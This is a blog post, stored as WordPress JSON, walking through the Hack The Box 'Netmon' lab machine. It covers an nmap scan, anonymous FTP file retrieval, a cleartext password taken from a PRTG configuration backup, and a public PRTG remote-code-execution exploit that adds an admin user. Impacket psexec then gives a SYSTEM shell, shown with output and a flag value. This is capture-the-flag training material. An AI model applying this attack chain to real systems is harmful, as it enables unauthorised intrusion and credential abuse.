{"id":3734,"date":"2020-08-16T04:12:17","date_gmt":"2020-08-15T19:12:17","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3734"},"modified":"2020-08-30T23:33:28","modified_gmt":"2020-08-30T14:33:28","slug":"hack-the-box-netmon-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3734","title":{"rendered":"Hack The Box &#8211; Netmon &#8211; Walkthrough"},"content":{"rendered":"<h3>FTP is publicly accessible</h3>\n<pre>\nnmap -A -n -F -T5 netmon.htb\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 15:31 UTC\nNmap scan report for netmon.htb (10.10.10.152)\nHost is up (0.045s latency).\nNot shown: 95 filtered ports\nPORT    STATE SERVICE      VERSION\n21/tcp  open  ftp          Microsoft ftpd\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| 02-03-19  12:18AM                 1024 .rnd\n| 02-25-19  10:15PM       &lt;DIR&gt;          inetpub\n| 07-16-16  09:18AM       &lt;DIR&gt;          PerfLogs\n| 02-25-19  10:56PM       &lt;DIR&gt;          Program Files\n| 02-03-19  12:28AM       &lt;DIR&gt;          Program Files (x86)\n| 02-03-19  08:08AM       &lt;DIR&gt;          Users\n|_02-25-19  11:49PM       &lt;DIR&gt;          Windows\n| ftp-syst:\n|_  SYST: Windows_NT\n80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)\n|_http-server-header: PRTG/18.1.37.13946\n|_http-title: PRTG Starting...\n|_http-trane-info: Problem with XML parsing of /evox/about\n135/tcp open  msrpc        Microsoft Windows RPC\n139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn\n445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: printer|switch\nRunning (JUST GUESSING): HP embedded (85%), Dell embedded (85%)\nOS CPE: cpe:/h:hp:designjet_650c cpe:/h:dell:powerconnect_5424\nAggressive OS guesses: HP DesignJet 650C printer (85%), Dell PowerConnect 5424 switch (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 5m31s, deviation: 0s, median: 5m30s\n|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)\n| smb-security-mode:\n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-security-mode:\n|   2.02:\n|_    Message signing enabled but not required\n| smb2-time:\n|   date: 2020-08-15T15:37:45\n|_  start_date: 2020-08-15T15:36:49\n</pre>\n<h3>Connect over FTP and retrieve user.txt</h3>\n<pre>\n# ftp netmon.htb\nConnected to netmon.htb.\n220 Microsoft FTP Service\nName (netmon.htb:root): anonymous\n331 Anonymous access allowed, send identity (e-mail name) as password.\nPassword:\n230 User logged in.\nRemote system type is Windows_NT.\n\nftp&gt; passive\nPassive mode on.\n\nftp&gt; ls\n227 Entering Passive Mode (10,10,10,152,207,23).\n150 Opening ASCII mode data connection.\n02-03-19  12:18AM                 1024 .rnd\n02-25-19  10:15PM       &lt;DIR&gt;          inetpub\n07-16-16  09:18AM       &lt;DIR&gt;          PerfLogs\n02-25-19  10:56PM       &lt;DIR&gt;          Program Files\n02-03-19  12:28AM       &lt;DIR&gt;          Program Files (x86)\n02-03-19  08:08AM       &lt;DIR&gt;          Users\n02-25-19  11:49PM       &lt;DIR&gt;          Windows\n226 Transfer complete.\n\nftp&gt; cd Users\\Public\n250 CWD command successful.\n\nftp&gt; dir\n227 Entering Passive Mode (10,10,10,152,207,27).\n125 Data connection already open; Transfer starting.\n02-03-19  08:05AM       &lt;DIR&gt;          Documents\n07-16-16  09:18AM       &lt;DIR&gt;          Downloads\n07-16-16  09:18AM       &lt;DIR&gt;          Music\n07-16-16  09:18AM       &lt;DIR&gt;          Pictures\n02-03-19  12:35AM                   33 user.txt\n07-16-16  09:18AM       &lt;DIR&gt;          Videos\n226 Transfer complete.\n\nftp&gt; mget user.txt\nmget user.txt? y\n227 Entering Passive Mode (10,10,10,152,207,29).\n125 Data connection already open; Transfer starting.\nWARNING! 1 bare linefeeds received in ASCII mode\nFile may not have transferred correctly.\n226 Transfer complete.\n33 bytes received in 0.20 secs (0.1649 kB/s)\n</pre>\n<h3>Try accessing port 80</h3>\n<p>Something called PRTG Network Monitor (NETMON) is running.<br />\n<a href=\"https://tech.akat.info/wp-content/uploads/2020/08/2020-08-16_040940.png\">(screenshot)</a></p>\n<p>Accessing the PRTG data directory over FTP, a backup of the configuration file can be retrieved.<br />\n<a href=\"https://tech.akat.info/wp-content/uploads/2020/08/2020-08-16_030733.png\">(screenshot)</a></p>\n<pre>\nftp&gt; cd \"Users\\\\All Users\\\\Paessler\\\\PRTG Network Monitor\\\\\"\n250 CWD command successful.\n\nftp&gt; ls\n227 Entering Passive Mode (10,10,10,152,207,212).\n125 Data connection already open; Transfer starting.\n08-15-20  12:18PM       &lt;DIR&gt;          Configuration Auto-Backups\n08-15-20  11:37AM       &lt;DIR&gt;          Log Database\n02-03-19  12:18AM       &lt;DIR&gt;          Logs (Debug)\n02-03-19  12:18AM       &lt;DIR&gt;          Logs (Sensors)\n02-03-19  12:18AM       &lt;DIR&gt;          Logs (System)\n08-15-20  11:37AM       &lt;DIR&gt;          Logs (Web Server)\n08-15-20  11:42AM       &lt;DIR&gt;          Monitoring Database\n02-25-19  10:54PM              1189697 PRTG Configuration.dat\n02-25-19  10:54PM              1189697 PRTG Configuration.old\n07-14-18  03:13AM              1153755 PRTG Configuration.old.bak\n08-15-20  01:42PM              1713485 PRTG Graph Data Cache.dat\n02-25-19  11:00PM       &lt;DIR&gt;          Report PDFs\n02-03-19  12:18AM       &lt;DIR&gt;          System Information Database\n02-03-19  12:40AM       &lt;DIR&gt;          Ticket Database\n02-03-19  12:18AM       &lt;DIR&gt;          ToDo Database\n226 Transfer complete.\n\nftp&gt; mget \"PRTG Configuration.old.bak\"\nmget PRTG Configuration.old.bak? y\n227 Entering Passive Mode (10,10,10,152,207,228).\n125 Data connection already open; Transfer starting.\n226 Transfer complete.\n1153755 bytes received in 3.23 secs (348.8171 kB/s)\n</pre>\n<h3>Log in with the credentials from the backup file</h3>\n<p>Inspecting the backup file retrieved earlier yields PrTg@dmin2018: the password is stored in clear text on the line after the User: prtgadmin comment.</p>\n<pre>\n# cat PRTG\\ Configuration.old.bak | grep -A 1 prtgadmin\n              &lt;!-- User: prtgadmin --&gt;\n              PrTg@dmin2018\n</pre>\n<p>These credentials do not work, so, judging from the dates of the configuration files, guess that the password is now PrTg@dmin2019 and log in with that.<br />\n<a href=\"https://tech.akat.info/wp-content/uploads/2020/08/2020-08-16_032132.png\">(screenshot)</a></p>\n<p>I looked around but found no clue pointing to administrator.</p>\n<h3>Search for vulnerabilities in PRTG Network Monitor (NETMON)</h3>\n<pre>\n# searchsploit prtg\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                         |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nPRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution                                                                                   | windows/webapps/46527.sh\nPRTG Network Monitor &lt; 18.1.39.1648 - Stack Overflow (Denial of Service)                                                                               | windows_x86/dos/44500.py\nPRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting                                                                                                | java/webapps/34108.txt\n------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n\n# searchsploit -m windows/webapps/46527.sh\n  Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution\n      URL: https://www.exploit-db.com/exploits/46527\n     Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh\nFile Type: Bourne-Again shell script, ASCII text executable, with very long lines, with CRLF line terminators\n\nCopied to: /home/shimizu/netmon/46527.sh\n\n# ./46527.sh -u http://10.10.10.152 -c \"_ga=GA1.2.1241551964.1597505933; _gid=GA1.2.1239716465.1597505933; OCTOPUS1813713946=e0RERDI4MEQ2LUFCNTYtNEVENi1CRjJBLUU5RjcxNUI4MzE1Nn0%3D; _gat=1\"\nbash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory\n\n# sed -i 's/\\r//' 46527.sh\n\n# ./46527.sh -u http://10.10.10.152 -c \"_ga=GA1.2.1241551964.1597505933; _gid=GA1.2.1239716465.1597505933; OCTOPUS1813713946=e0RERDI4MEQ2LUFCNTYtNEVENi1CRjJBLUU5RjcxNUI4MzE1Nn0%3D; _gat=1\"\n\n[+]#########################################################################[+]\n[*] Authenticated PRTG network Monitor remote code execution                [*]\n[+]#########################################################################[+]\n[*] Date: 11/03/2019                                                        [*]\n[+]#########################################################################[+]\n[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*]\n[+]#########################################################################[+]\n[*] Vendor Homepage: https://www.paessler.com/prtg                          [*]\n[*] Version: 18.2.38                                                        [*]\n[*] CVE: CVE-2018-9276                                                      [*]\n[*] Reference: https://www.codewatch.org/blog/?p=453                        [*]\n[+]#########################################################################[+]\n\n# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.\n# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'\n\n[+]#########################################################################[+]\n\n [*] file created\n [*] sending notification wait....\n\n [*] adding a new user 'pentest' with password 'P3nT3st'\n [*] sending notification wait....\n\n [*] adding a user pentest to the administrators group\n [*] sending notification wait....\n\n\n [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!\n</pre>\n<p>The script ships with CRLF line terminators, which is why the first run fails with a bad interpreter error; stripping the carriage returns with sed fixes it. The cookie was taken from the browser session logged in earlier.<br />\n<a href=\"https://tech.akat.info/wp-content/uploads/2020/08/2020-08-16_033229.png\">(screenshot)</a></p>\n<h3>Retrieve root.txt as the pentest user</h3>\n<pre>\n# cd /usr/share/doc/python3-impacket/examples\n# python3 psexec.py pentest:'P3nT3st!'@10.10.10.152\nImpacket v0.9.21 - Copyright 2020 SecureAuth Corporation\n\n[*] Requesting shares on 10.10.10.152.....\n[*] Found writable share ADMIN$\n[*] Uploading file CTXMidGW.exe\n[*] Opening SVCManager on 10.10.10.152.....\n[*] Creating service Gvmj on 10.10.10.152.....\n[*] Starting service Gvmj.....\n[!] Press help for extra shell commands\nMicrosoft Windows [Version 10.0.14393]\n(c) 2016 Microsoft Corporation. All rights reserved.\n\nC:\\\\Windows\\\\system32&gt;type C:\\\\Users\\\\Administrator\\\\Desktop\\\\root.txt\n3018977fb944bf1878f75b879fba67cc\n</pre>\n","protected":false},"excerpt":{"rendered":"<p>FTP is publicly accessible nmap -A -n -F -T5 netmon.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-15 15:31 UTC Nmap  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3734"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3734"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3734\/revisions"}],"predecessor-version":[{"id":3784,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3734\/revisions\/3784"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3734"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3734"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3734"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}